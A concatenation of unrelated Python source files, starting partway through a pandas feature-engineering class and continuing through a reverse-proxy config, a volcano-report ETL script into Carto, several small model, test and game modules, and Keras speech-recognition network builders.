:param variable_to_predict: the variable to predict columns name
:param options: options containing the configuration of the transformation for the variable to predict
example:
"y_variable": {
"type": "binary", # binary/multi/continuous - string
"categories_labels": ["LABEL_1", "LABEL_2"], # category labels - list
"continuous_to_category_bins": [-0.5, 0.5, 1.5], # bins values - list
"label_to_predict": ["LABEL_1"] # target label to predict - list
},
:return: 'data_df' - without the variable to predict, 'final_y' - the variable to predict after transformation
"""
# y variable configurations
y_df = data_df[variable_to_predict]
final_y = pd.DataFrame()
y_variable_type = options['type']
target_label = options['label_to_predict']
# y variable is binary OR one vs all
if y_variable_type == 'binary' or (y_variable_type == 'multi' and len(target_label) == 1):
y_dummies = pd.get_dummies(y_df)
final_y = y_dummies[target_label[0]]
# y variable is multi class
elif y_variable_type == 'multi' and len(target_label) < len(y_df.unique()):
final_y = y_df.apply(lambda x: x if x in target_label else "other")
# Example for indexing the labels
# labels_y = final_y.copy()
# for i in range(len(target_model)):
# labels_y = labels_y.apply(lambda x: i + 1 if x == target_model[i] else x)
# final_y = labels_y.apply(lambda x: 0 if not type(x)==int else x)
elif y_variable_type == 'continuous':
bins = options["continuous_to_category_bins"]
labels = options["categories_labels"]
final_y = pd.cut(y_df, bins=bins, labels=labels)
else:
final_y = y_df
data_df = data_df.drop(variable_to_predict, axis=1)
return data_df, final_y
def transform_and_split_features_to_categorical_and_continuous(self, data, dates_format=None, auto_bin_continuous_features=False, max_categories_num=10):
"""
Transforming DataFrame features by their value types
:param data: the DataFrame
:param dates_format: date formats expected in the DataFrame
:param auto_bin_continuous_features: whether to bin continuous features automatically
:param max_categories_num: max unique values in a feature before deciding to auto bin
:return: the DataFrame with transformed date columns, lists of features by their type, and binned features
"""
if dates_format is None:
dates_format = ["%d/%m/%Y", "%Y-%m-%d"]
data_types = data.dtypes
today = datetime.datetime.now()
continuous_columns = []
continuous_bins = {}
categorical_columns = []
binary_columns = []
for feature, curr_type in data_types.iteritems():
mysql_type, date_format = self._convert_text_to_date_type(curr_type, feature, data, dates_format)
if mysql_type == "DATETIME": # converting features from datetime to time_passed_from_date
data[feature] = data[feature].apply(
lambda x: x if self._is_nan(x) else self._elapsed_time_from_date(x, today, date_format))
if auto_bin_continuous_features:
continuous_bins[feature] = np.sort(list(
{
min(data[feature]) - 1,
np.quantile(data[feature].dropna(), 0.2),
np.quantile(data[feature].dropna(), 0.4),
np.quantile(data[feature].dropna(), 0.6),
np.quantile(data[feature].dropna(), 0.8),
max(data[feature]) + 1
}))
else:
continuous_columns += [feature]
elif mysql_type == 'NUMERIC':
unique_values = data[feature].dropna().unique()
if len(unique_values) == 1:
data = data.drop(feature, axis=1)
elif len(unique_values) == 2:
binary_columns += [feature]
elif (2 < len(unique_values) <= max_categories_num) and auto_bin_continuous_features:
categorical_columns += [feature]
elif auto_bin_continuous_features:
continuous_bins[feature] = np.sort(list(
{
min(data[feature]) - 1,
np.quantile(data[feature].dropna(), 0.2),
np.quantile(data[feature].dropna(), 0.4),
np.quantile(data[feature].dropna(), 0.6),
np.quantile(data[feature].dropna(), 0.8),
max(data[feature]) + 1
}))
else:
continuous_columns += [feature]
else: # mysql_type == TEXT
categorical_columns += [feature]
return data, categorical_columns, continuous_columns, binary_columns, continuous_bins
def combine_categorical_features(self, data_df, evaluated_df, sep='_|_'):
"""
Combining categories for each feature
:param data_df: original DataFrame
:param evaluated_df: calculated evaluated DataFrame for each category for each feature
:param sep: separation string
:return: DataFrame with combined categories
"""
features_mapping = {}
results_df = pd.DataFrame()
groups = pd.DataFrame.groupby(evaluated_df, 'feature_original_name')
for feature_original_name, group in groups:
if group.shape[0] > 1:
# feature_dummies_df = pd.get_dummies(data_df[feature_original_name])
filtered_feature_dummies_df = data_df[group['feature']]
combined_feature = filtered_feature_dummies_df.sum(axis=1)
# preparing feature output name
categorical_values = group['feature'].apply(lambda x: x.replace(feature_original_name + "_", ""))
categorical_values = categorical_values.astype(data_df.columns.dtype)
feature_output_name = feature_original_name + "_"
for val in categorical_values:
feature_output_name += "_" + str(val)
# adds combined feature to results DataFrame
results_df[feature_output_name] = combined_feature
else:
# save features mappings
custom_feature_full_name = group['feature'].iloc[0]
_, new_feature_value = custom_feature_full_name.split(sep)
features_mapping[feature_original_name] = [{
"name": custom_feature_full_name,
"categories": [new_feature_value]
}]
results_df[group['feature']] = data_df[group['feature']]
return results_df, features_mapping
def fillna_features(self, data, features_handling, default_filling=0, missing_values=None):
"""
Feature handling with filling missing values strategies
:param data: DataFrame
:param features_handling: configuration of how to handle each feature
:return: updated DataFrame with the requested filling
"""
        if missing_values is None:
            missing_values = {}
methods = {
"mean": lambda a: np.mean(a),
"median": lambda a: np.median(a),
"mode": lambda a: mode(a).mode[0],
"none": lambda a: np.nan,
"nan": lambda a: np.nan
}
if not isinstance(data, pd.DataFrame):
raise UnsupportedFileType("data type should be Dataframe")
if len(list(missing_values.keys())) > 0:
data.fillna(missing_values, inplace=True)
else:
missing_values = {}
specific_features = features_handling.keys()
for feature_key in data.columns:
# applying fill na on a feature
if feature_key in specific_features:
filling_missing_value = features_handling[feature_key].get("fillna")
else:
filling_missing_value = default_filling
            if isinstance(filling_missing_value, str) and filling_missing_value.lower() in methods:
                filling_missing_value = filling_missing_value.lower()
val = methods[filling_missing_value](data[feature_key])
data[feature_key].fillna(val, inplace=True)
missing_values[feature_key] = val
elif isinstance(filling_missing_value, numbers.Number):
data[feature_key].fillna(filling_missing_value, inplace=True)
missing_values[feature_key] = filling_missing_value
else:
filling_missing_value = eval(filling_missing_value)
if filling_missing_value is None or filling_missing_value == np.nan:
                    data[feature_key] = data[feature_key].fillna(np.nan)
missing_values[feature_key] = np.nan
else:
val = filling_missing_value(data[feature_key])
data[feature_key].fillna(val, inplace=True)
missing_values[feature_key] = val
return data, missing_values
def transform_features(self, data,features_handling):
'''
Feature handling with transformation strategies
:param data:
:param features_handling:
:return: DataFrame - updated DataFrame with the requested transformations
'''
if not isinstance(data, pd.DataFrame):
raise UnsupportedFileType("data type should be Dataframe")
features = features_handling.keys()
for feature_key in features:
# applying transformations
feature_transformation_methods = features_handling[feature_key].get("transformation", [])
for feature_transformation_method in feature_transformation_methods:
data[feature_key] = eval(feature_transformation_method)(data[feature_key])
# applying dummies
feature_dummies_flag = features_handling[feature_key].get("dummies", False)
if feature_dummies_flag:
dummies_df = pd.get_dummies(data[feature_key], dummy_na=False)
dummies_df['index'] = data.index.values
dummies_df = dummies_df.set_index('index')
data = pd.concat([data, dummies_df], axis=1)
data = data.drop(feature_key, axis=1)
return data
def get_days_from_date(self, data, date_column, extraction_date):
datenow = datetime.datetime.strptime(extraction_date, '%Y%m%d')
transformed_data = date_column
transformed_data = datenow - pd.to_datetime(data[transformed_data], format='%Y%m%d')
data[date_column] = transformed_data.dt.days
return data
def remove_features_by_null_threshold(self, data, percentage=0.3):
"""
        Removing features whose fraction of nulls exceeds 'percentage'
:param data: the DataFrame
:param percentage: percentage - default 30%
:return: pandas DataFrame
"""
# data = data.loc[:, data.isnull().mean() < percentage]
n_features = data.shape[1]
data = data.loc[:, data.isnull().mean() < percentage]
new_n_features = data.shape[1]
if n_features == new_n_features:
print("Features number did not changed, did not found null features more than %0.2f percentage" % percentage)
else:
print("%d Features has removed, new data shape is (%d,%d)" % ((n_features - new_n_features), data.shape[0], data.shape[1]))
return data
def _is_nan(self, x):
try:
return np.isnan(x) or x == ""
except:
return False
def _convert_text_to_date_type(self, data_type, field, csv_file, dates_format=None):
if dates_format is None:
dates_format = ["%d/%m/%Y", "%Y-%m-%d"]
if data_type in ['int64', 'float64', 'float32', 'int32']:
return "NUMERIC", None
elif data_type == "object":
for val in csv_file[field]:
if val is not None and val is not np.nan:
for date_format in dates_format:
try:
datetime.datetime.strptime(val, date_format)
return "DATETIME", date_format
except:
continue
return "TEXT", None
else:
return "TEXT", None
else:
return "TEXT", None
def _elapsed_time_from_date(self, x, today, date_format):
try:
return np.round(np.abs((today - datetime.datetime.strptime(str(x), date_format)).days) / 365, 1)
except:
return np.nan
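# Illustrative usage sketch (not part of the class): how a few of the helpers
# above can be chained. The column names, bin edges and labels are made up.
def _demo_feature_engineering():
    fe = ClassificationFeatureEngineering()
    df = pd.DataFrame({"age": [22, 35, 58], "noise": [1, 2, 3], "label": ["A", "B", "A"]})
    df = fe.drop_features(df, features_to_drop=["noise"])
    df = fe.bin_continuous_features(df, features_to_bin=[{"name": "age", "bins": [30, 50]}])
    df, y = fe.handle_y_variable(df, "label", {"type": "binary", "label_to_predict": ["A"]})
    return df, y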
|
from typing import Optional, Union
from urllib.parse import urljoin
import aiohttp
from starlette.datastructures import Headers
from starlette.requests import Request
from starlette.types import Scope
from starlette.websockets import WebSocket
Headerlike = Union[dict, Headers]
class ProxyConfig:
def get_upstream_url(self, *, scope: Scope) -> str:
"""
Get the upstream URL for a client request.
"""
raise NotImplementedError("...")
def get_upstream_url_with_query(self, *, scope: Scope) -> str:
"""
Get the upstream URL for a client request, including any query parameters to include.
"""
# The default implementation simply appends the original URL's query string to the
# upstream URL generated by `get_upstream_url`.
url = self.get_upstream_url(scope=scope)
query_string = scope.get("query_string")
if query_string:
sep = "&" if "?" in url else "?"
url += "{}{}".format(sep, query_string.decode("utf-8"))
return url
def process_client_headers(self, *, scope: Scope, headers: Headers) -> Headerlike:
"""
Process client HTTP headers before they're passed upstream.
"""
return headers
def process_upstream_headers(
self, *, scope: Scope, proxy_response: aiohttp.ClientResponse
) -> Headerlike:
"""
Process upstream HTTP headers before they're passed to the client.
"""
return proxy_response.headers # type: ignore
def get_upstream_http_options(
self, *, scope: Scope, client_request: Request, data
) -> dict:
"""
Get request options (as passed to aiohttp.ClientSession.request).
"""
return dict(
method=client_request.method,
url=self.get_upstream_url_with_query(scope=scope),
data=data,
headers=self.process_client_headers(
scope=scope,
headers=client_request.headers,
),
allow_redirects=False,
)
def get_upstream_websocket_options(
self, *, scope: Scope, client_ws: WebSocket
) -> dict:
"""
Get websocket connection options (as passed to aiohttp.ClientSession.ws_connect).
"""
return dict(
method=scope.get("method", "GET"),
url=self.get_upstream_url(scope=scope),
headers=self.process_client_headers(scope=scope, headers=client_ws.headers),
)
class BaseURLProxyConfigMixin:
upstream_base_url: str
rewrite_host_header: Optional[str] = None
def get_upstream_url(self, scope: Scope) -> str:
return urljoin(self.upstream_base_url, scope["path"])
def process_client_headers(
self, *, scope: Scope, headers: Headerlike
) -> Headerlike:
"""
Process client HTTP headers before they're passed upstream.
"""
if self.rewrite_host_header:
headers = headers.mutablecopy() # type: ignore
headers["host"] = self.rewrite_host_header
return super().process_client_headers(scope=scope, headers=headers) # type: ignore
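# Illustrative sketch (not part of the module): a concrete config is typically
# built by mixing BaseURLProxyConfigMixin into ProxyConfig and pointing it at an
# upstream base URL. The URL and host header below are made-up example values.
class ExampleProxyConfig(BaseURLProxyConfigMixin, ProxyConfig):
    upstream_base_url = "http://localhost:8000"
    rewrite_host_header = "localhost:8000"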
|
import logging
import sys
import os
import requests as req
from collections import OrderedDict
import cartosql
import lxml.etree
from xmljson import parker as xml2json
from dateutil import parser
import requests
import datetime
### Constants
SOURCE_URL = "http://volcano.si.edu/news/WeeklyVolcanoRSS.xml"
DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
LOG_LEVEL = logging.INFO
CLEAR_TABLE_FIRST = False
### Table name and structure
CARTO_TABLE = 'dis_003_volcano_reports'
CARTO_SCHEMA = OrderedDict([
('uid', 'text'),
('the_geom', 'geometry'),
('pubdate', 'timestamp'),
('volcano_name', 'text'),
('country_name', 'text'),
('description', 'text'),
('sources', 'text')
])
UID_FIELD = 'uid'
TIME_FIELD = 'pubdate'
# Table limits
MAX_ROWS = 1000000
MAX_AGE = datetime.datetime.today() - datetime.timedelta(days=365*5)
DATASET_ID = '60d3b365-6c0b-4f1c-9b7f-f3f00f2a05d7'
def lastUpdateDate(dataset, date):
apiUrl = 'http://api.resourcewatch.org/v1/dataset/{0}'.format(dataset)
headers = {
'Content-Type': 'application/json',
'Authorization': os.getenv('apiToken')
}
body = {
"dataLastUpdated": date.isoformat()
}
try:
r = requests.patch(url = apiUrl, json = body, headers = headers)
logging.info('[lastUpdated]: SUCCESS, '+ date.isoformat() +' status code '+str(r.status_code))
return 0
except Exception as e:
logging.error('[lastUpdated]: '+str(e))
###
## Carto code
###
def checkCreateTable(table, schema, id_field, time_field):
'''
Get existing ids or create table
Return a list of existing ids in time order
'''
if cartosql.tableExists(table):
logging.info('Table {} already exists'.format(table))
else:
logging.info('Creating Table {}'.format(table))
cartosql.createTable(table, schema)
cartosql.createIndex(table, id_field, unique=True)
if id_field != time_field:
cartosql.createIndex(table, time_field)
def deleteExcessRows(table, max_rows, time_field, max_age=''):
'''Delete excess rows by age or count'''
num_dropped = 0
if isinstance(max_age, datetime.datetime):
max_age = max_age.isoformat()
# 1. delete by age
if max_age:
r = cartosql.deleteRows(table, "{} < '{}'".format(time_field, max_age))
num_dropped = r.json()['total_rows']
# 2. get sorted ids (old->new)
r = cartosql.getFields('cartodb_id', table, order='{}'.format(time_field),
f='csv')
ids = r.text.split('\r\n')[1:-1]
# 3. delete excess
if len(ids) > max_rows:
r = cartosql.deleteRowsByIDs(table, ids[:-max_rows])
num_dropped += r.json()['total_rows']
if num_dropped:
logging.info('Dropped {} old rows from {}'.format(num_dropped, table))
return num_dropped
###
## Accessing remote data
###
def genUID(lat,lon,dt):
return '{}_{}_{}'.format(lat,lon,dt)
def processData(existing_ids):
"""
    Inputs: SOURCE_URL where the RSS feed is published, existing_ids not to duplicate
    Actions: Retrieves data, dedupes and formats it, and adds to Carto table
Output: Number of new rows added
"""
new_data = []
new_ids = []
res = req.get(SOURCE_URL)
xml = lxml.etree.fromstring(res.content)
json = xml2json.data(xml)
items = json['channel']['item']
for item in items:
title = item['title'].split(')')[0].split('(')
place_info = [place.strip() for place in title]
volcano_name = place_info[0]
country_name = place_info[1]
coords = item['{http://www.georss.org/georss}point'].split(' ')
dt = parser.parse(item['pubDate'], fuzzy=True).strftime(DATETIME_FORMAT)
lat = coords[0]
lon = coords[1]
geom = {
'type':'Point',
'coordinates':[lon,lat]
}
info = item['description'].split('Source:')
if len(info) < 2:
info = item['description'].split('Sources:')
description_text = [text.replace('<p>','').replace('</p>','') for text in info]
description = description_text[0]
sources = description_text[1]
_uid = genUID(lat,lon,dt)
if _uid not in existing_ids + new_ids:
new_ids.append(_uid)
row = []
for field in CARTO_SCHEMA:
if field == 'uid':
row.append(_uid)
elif field == 'the_geom':
row.append(geom)
elif field == 'pubdate':
row.append(dt)
elif field == 'description':
row.append(description)
elif field == 'sources':
row.append(sources)
elif field == 'volcano_name':
row.append(volcano_name)
elif field == 'country_name':
row.append(country_name)
new_data.append(row)
num_new = len(new_ids)
if num_new:
logging.info('Adding {} new records'.format(num_new))
cartosql.blockInsertRows(CARTO_TABLE, CARTO_SCHEMA.keys(), CARTO_SCHEMA.values(), new_data)
return(num_new)
def get_most_recent_date(table):
#pubdate is the date the report was published
r = cartosql.getFields('pubdate', table, f='csv', post=True)
dates = r.text.split('\r\n')[1:-1]
dates.sort()
most_recent_date = datetime.datetime.strptime(dates[-1], '%Y-%m-%d %H:%M:%S')
return most_recent_date
###
## Application code
###
def main():
logging.basicConfig(stream=sys.stderr, level=LOG_LEVEL)
if CLEAR_TABLE_FIRST:
if cartosql.tableExists(CARTO_TABLE):
cartosql.deleteRows(CARTO_TABLE, 'cartodb_id IS NOT NULL', user=os.getenv('CARTO_USER'), key=os.getenv('CARTO_KEY'))
### 1. Check if table exists, if not, create it
checkCreateTable(CARTO_TABLE, CARTO_SCHEMA, UID_FIELD, TIME_FIELD)
### 2. Retrieve existing data
r = cartosql.getFields(UID_FIELD, CARTO_TABLE, order='{} desc'.format(TIME_FIELD), f='csv')
existing_ids = r.text.split('\r\n')[1:-1]
num_existing = len(existing_ids)
    ### 3. Fetch data from the RSS feed, dedupe, process
num_new = processData(existing_ids)
### 4. Delete data to get back to MAX_ROWS
num_dropped = deleteExcessRows(CARTO_TABLE, MAX_ROWS, TIME_FIELD, MAX_AGE)
### 5. Notify results
total = num_existing + num_new - num_dropped
# Get most recent update date
most_recent_date = get_most_recent_date(CARTO_TABLE)
lastUpdateDate(DATASET_ID, most_recent_date)
    logging.info('Total rows: {}, New rows: {}, Max: {}'.format(total, num_new, MAX_ROWS))
logging.info("SUCCESS")
|
# -*- coding:utf-8 -*-
# Copyright (c) 2013, Theo Crevon
# Copyright (c) 2013, Greg Leclercq
#
# See the file LICENSE for copying permission.
from swf.models.event.base import Event
from swf.models.event.compiler import CompiledEvent
class MarkerEvent(Event):
_type = "Marker"
class CompiledMarkerEvent(CompiledEvent):
_type = "Marker"
states = ("recorded",)
transitions = {}
initial_state = "recorded"
|
# Copyright (C) 2019 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from requests_mock.contrib import fixture as requests_mock_fixture
import testtools
from unittest import mock
from cliff import columns as cliff_columns
class FixturedTestCase(testtools.TestCase):
client_fixture_class = None
api_version = '1'
def setUp(self):
super(FixturedTestCase, self).setUp()
self.app = mock.MagicMock()
if self.client_fixture_class:
self.requests_mock = self.useFixture(requests_mock_fixture.
Fixture())
fix = self.client_fixture_class(self.requests_mock,
api_version=self.api_version)
self.cs = self.useFixture(fix).client
def check_parser(self, cmd, args, verify_args):
cmd_parser = cmd.get_parser('check_parser')
try:
parsed_args = cmd_parser.parse_args(args)
except SystemExit:
raise ParserException
for av in verify_args:
attr, value = av
if attr:
self.assertIn(attr, parsed_args)
self.assertEqual(getattr(parsed_args, attr), value)
return parsed_args
def assertNotCalled(self, m, msg=None):
"""Assert a function was not called"""
if m.called:
if not msg:
msg = 'method %s should not have been called' % m
self.fail(msg)
def assertListItemsEqual(self, expected, actual):
"""Assertion based on human_readable values of list items"""
self.assertEqual(len(expected), len(actual))
for col_expected, col_actual in zip(expected, actual):
if isinstance(col_actual, tuple):
self.assertListItemsEqual(col_expected, col_actual)
elif isinstance(col_expected, cliff_columns.FormattableColumn):
self.assertIsInstance(col_actual, col_expected.__class__)
self.assertEqual(col_expected.human_readable(),
col_actual.human_readable())
else:
self.assertEqual(col_expected, col_actual)
class ParserException(Exception):
pass
|
from AudioData import AudioData
import numpy as np
def test_it_handles_already_normalized_data():
audioData = AudioData()
arr = np.array([0, 1])
assert (audioData.normalize(arr) == arr).all()
def test_that_it_normalizes_data():
audioData = AudioData()
arr = np.array([0, 2])
assert (audioData.normalize(arr) == np.array([0, 1])).all()
def test_that_it_handles_negative_numbers():
audioData = AudioData()
arr = np.array([-1, 0])
assert (audioData.normalize(arr) == np.array([0, 1])).all()
def test_that_it_handles_a_large_range():
audioData = AudioData()
arr = np.array([-2, 2])
assert (audioData.normalize(arr) == np.array([0, 1])).all()
def test_that_it_handles_multiple_numbers():
audioData = AudioData()
arr = np.array([-2, -1, 0, 1, 2, 3])
assert (audioData.normalize(arr) == np.array([0, 0.2, 0.4, 0.6, 0.8, 1])).all()
def test_that_it_handles_multiple_dimensions():
audioData = AudioData()
arr = np.array([[0, 1], [3, 4]])
assert (audioData.normalize(arr) == np.array([[0, 0.25], [0.75, 1]])).all()
def test_that_it_handles_multiple_dimensions_with_negative_numbers():
audioData = AudioData()
arr = np.array([[-2, -3], [2, 1]])
assert (audioData.normalize(arr) == np.array([[0.2, 0], [1, 0.8]])).all()
def test_that_it_handles_a_divisor_that_is_zero():
audioData = AudioData()
arr = np.array([0, 0])
assert (audioData.normalize(arr) == np.array([0, 0])).all()
def test_that_it_handles_a_divisor_that_is_zero_with_numbers_that_are_not():
audioData = AudioData()
arr = np.array([2, 2])
assert (audioData.normalize(arr) == np.array([0, 0])).all()
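# A minimal sketch (NOT the real AudioData implementation) of a min-max
# normalize() that would satisfy the tests above, including the zero-range
# inputs, which map to all zeros.
def _sketch_normalize(arr):
    arr = np.asarray(arr, dtype=float)
    span = arr.max() - arr.min()
    if span == 0:
        return np.zeros_like(arr)
    return (arr - arr.min()) / span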
|
from app.models import db
class LibraryBook(db.Model):
__tablename__ = "library_book"
# table columns
id = db.Column(db.Integer, primary_key=True)
book_id = db.Column(db.Integer, db.ForeignKey("book.id"), nullable=False)
library_id = db.Column(db.Integer, db.ForeignKey("library.id"), nullable=False)
is_available = db.Column(db.Boolean)
# relationships
book = db.relationship("Book", back_populates="libraries")
library = db.relationship("Library", back_populates="books")
|
import pygame
from pygame.locals import *
import obstacle
from utils import *
class Environnement(pygame.sprite.Group):
def __init__(self):
super().__init__()
self.new_obs = None
def process_event(self, event):
if event.type == MOUSEBUTTONDOWN:
# Check for collision
clicked_sprites = [s for s in self if s.rect.collidepoint(event.pos)]
if event.button == 1 and self.new_obs == None:
if not clicked_sprites:
# Create new obstacle
self.new_obs = obstacle.Obstacle(event.pos, (0, 0))
self.add(self.new_obs)
if event.button == 3:
for s in clicked_sprites:
self.remove(s)
s.kill()
if event.type == MOUSEBUTTONUP:
if event.button == 1 and self.new_obs != None:
size = self.new_obs.rect.size
if size[0] < 1 or size[1] < 1:
print('Remove sprite, too small')
self.remove(self.new_obs)
self.new_obs = None
return self.new_obs
def update_selection(self, new_pos, collision_group):
if self.new_obs == None:
return
# NOTE: Really ugly but I haven't found a better solution yet
next_obs = obstacle.Obstacle(self.new_obs.rect.topleft, self.new_obs.rect.size)
next_obs.update_button_right(new_pos)
# print(next_obs.rect, self.new_obs.rect)
collision_list = pygame.sprite.spritecollide(next_obs, collision_group, False, collided = square_circle_collider)
if collision_list:
return
self.new_obs.update_button_right(new_pos)
|
# -*- coding: utf-8 -*-
# <standard imports>
from __future__ import division
import random
import otree.models
import otree.constants
from otree.db import models
from otree import widgets
from otree.common import Currency as c, currency_range, safe_json
from otree.constants import BaseConstants
from otree.models import BaseSubsession, BaseGroup, BasePlayer
# </standard imports>
author = 'Your name here'
doc = """
Your app description
"""
class Constants(BaseConstants):
name_in_url = 'public_goods_nopunishment_noise'
players_per_group = 3
num_rounds = 30
# define more constants here
endowment = c(20)
efficiency_factor = 0.5
class Subsession(BaseSubsession):
pass
class Group(BaseGroup):
# <built-in>
subsession = models.ForeignKey(Subsession)
# </built-in>
total_contribution = models.CurrencyField()
individual_share = models.CurrencyField()
def set_payoffs(self):
self.total_contribution = sum([p.contribution for p in self.get_players()])
self.individual_share = self.total_contribution * Constants.efficiency_factor
for p in self.get_players():
p.payoff = Constants.endowment - p.contribution + self.individual_share
x = random.random()
if x < 0.1:
p.record = 0
if x >= 0.1:
p.record = p.contribution
class Player(BasePlayer):
# <built-in>
subsession = models.ForeignKey(Subsession)
group = models.ForeignKey(Group, null = True)
# </built-in>
contribution = models.CurrencyField(choices=[0,Constants.endowment],widget=widgets.RadioSelect())
record = models.CurrencyField()
def other_player(self):
"""Returns other player in group. Only valid for 2-player groups."""
return self.get_others_in_group()
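# Worked example (illustrative): with contributions of (20, 20, 0) and
# efficiency_factor = 0.5, total_contribution = 40 and individual_share = 20,
# so payoffs are 20 - 20 + 20 = 20, 20, and 20 - 0 + 20 = 40 respectively
# (independently, each player's public record has a 10% chance of being shown as 0).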
|
from keras import backend as K
from keras.models import Model
from keras.layers import (BatchNormalization, Conv1D, Dense, Input,
TimeDistributed, Activation, Bidirectional, SimpleRNN, GRU, LSTM, CuDNNGRU, CuDNNLSTM, Dropout)
def simple_rnn_model(input_dim, output_dim=29):
""" Build a recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add recurrent layer
simp_rnn = GRU(output_dim, return_sequences=True,
implementation=2, name='rnn')(input_data)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(simp_rnn)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
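# Example call (illustrative; the input dimension depends on the chosen acoustic
# features, e.g. 161 for spectrogram-style features or 13 for MFCCs):
#   model_0 = simple_rnn_model(input_dim=161)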
def rnn_model(input_dim, units, activation, output_dim=29):
""" Build a recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add recurrent layer
simp_rnn = GRU(units, activation=activation,
return_sequences=True, implementation=2, name='rnn')(input_data)
# TODO: Add batch normalization
bn_rnn = BatchNormalization(name = 'bn')(simp_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(bn_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def cnn_rnn_model(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, units, output_dim=29, rnn_type = 'SIMPLE'):
""" Build a recurrent + convolutional network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add convolutional layer
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='conv1d')(input_data)
# Add batch normalization
bn_cnn = BatchNormalization(name='bn_conv_1d')(conv_1d)
# Add a recurrent layer
simp_rnn = rnn_tensor(units, bn_cnn, rnn_type = rnn_type)
# TODO: Add batch normalization
bn_rnn = BatchNormalization(name='bn_rnn')(simp_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(bn_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model
def cnn_output_length(input_length, filter_size, border_mode, stride,
dilation=1):
""" Compute the length of the output sequence after 1D convolution along
time. Note that this function is in line with the function used in
Convolution1D class from Keras.
Params:
input_length (int): Length of the input sequence.
filter_size (int): Width of the convolution kernel.
border_mode (str): Only support `same` or `valid`.
stride (int): Stride size used in 1D convolution.
dilation (int)
"""
if input_length is None:
return None
assert border_mode in {'same', 'valid'}
dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)
if border_mode == 'same':
output_length = input_length
elif border_mode == 'valid':
output_length = input_length - dilated_filter_size + 1
return (output_length + stride - 1) // stride
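# Worked example for cnn_output_length (values chosen for illustration):
#   cnn_output_length(100, filter_size=11, border_mode='valid', stride=2)
#     -> valid output is 100 - 11 + 1 = 90, then (90 + 2 - 1) // 2 = 45
#   cnn_output_length(100, filter_size=11, border_mode='same', stride=2) -> 50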
def deep_rnn_model(input_dim, units, recur_layers, output_dim=29, rnn_type = 'GRU' ):
""" Build a deep recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add recurrent layers, each with batch normalization
rnn = rnn_tensor(units, input_data,
rnn_type = rnn_type)
bn_rnn = BatchNormalization(name = 'bn-rnn')(rnn)
dropout = Dropout (rate =.2)(bn_rnn)
for layer in range (1, recur_layers):
rnn = rnn_tensor(units, dropout, layer = str(layer), rnn_type = rnn_type)
bn_rnn = BatchNormalization(name = 'bn-rnn'+ str(layer))(rnn)
dropout = Dropout (rate =.2)(bn_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(dropout)
dropout = Dropout (rate =.2)(time_dense)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(dropout)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def rnn_tensor (units, input, return_sequences =True, implementation = 2, layer = "", rnn_type = 'SIMPLE'):
return rnn_layer(units= units, return_sequences = return_sequences, implementation= implementation, layer= layer, rnn_type=rnn_type)(input)
def rnn_layer(units, return_sequences=True, implementation=2, layer="", rnn_type='SIMPLE'):
    if rnn_type == 'SIMPLE':
        simp_rnn = SimpleRNN(units, activation='relu',
            return_sequences=return_sequences, implementation=implementation, name='rnn_simp' + layer)
    elif rnn_type == 'GRU':
        simp_rnn = GRU(units,
            return_sequences=return_sequences, implementation=implementation, name='rnn_gru' + layer)
    elif rnn_type == "LSTM":
        simp_rnn = LSTM(units,
            return_sequences=return_sequences, implementation=implementation, name='rnn_lstm' + layer)
    elif rnn_type == 'Cu-GRU':
        simp_rnn = CuDNNGRU(units,
            return_sequences=return_sequences, name='CuDNN_gru' + layer)
    elif rnn_type == "Cu-LSTM":
        simp_rnn = CuDNNLSTM(units,
            return_sequences=return_sequences, name='CuDNN_lstm' + layer)
    else:
        raise ValueError('Unsupported rnn_type: ' + rnn_type)
    return simp_rnn
def bidirectional_rnn_model(input_dim, units, output_dim=29, rnn_type = "GRU"):
""" Build a bidirectional recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add bidirectional recurrent layer
#rnn = rnn_layer(units, rnn_type = rnn_type)
#print (type(rnn), type (input_data), type (Dense(5)))
bidir_rnn1 = Bidirectional(rnn_layer(units, rnn_type = rnn_type)) (input_data)
#rnn_bn = BatchNormalization(name='rnn-bn1')
#bidir_rnn2 = Bidirectional(rnn_layer(units, input_data,rnn_type = rnn_type)) (input_data)
#rnn_bn2 = BatchNormalization(name='rnn-bn2')(
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(bidir_rnn1)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
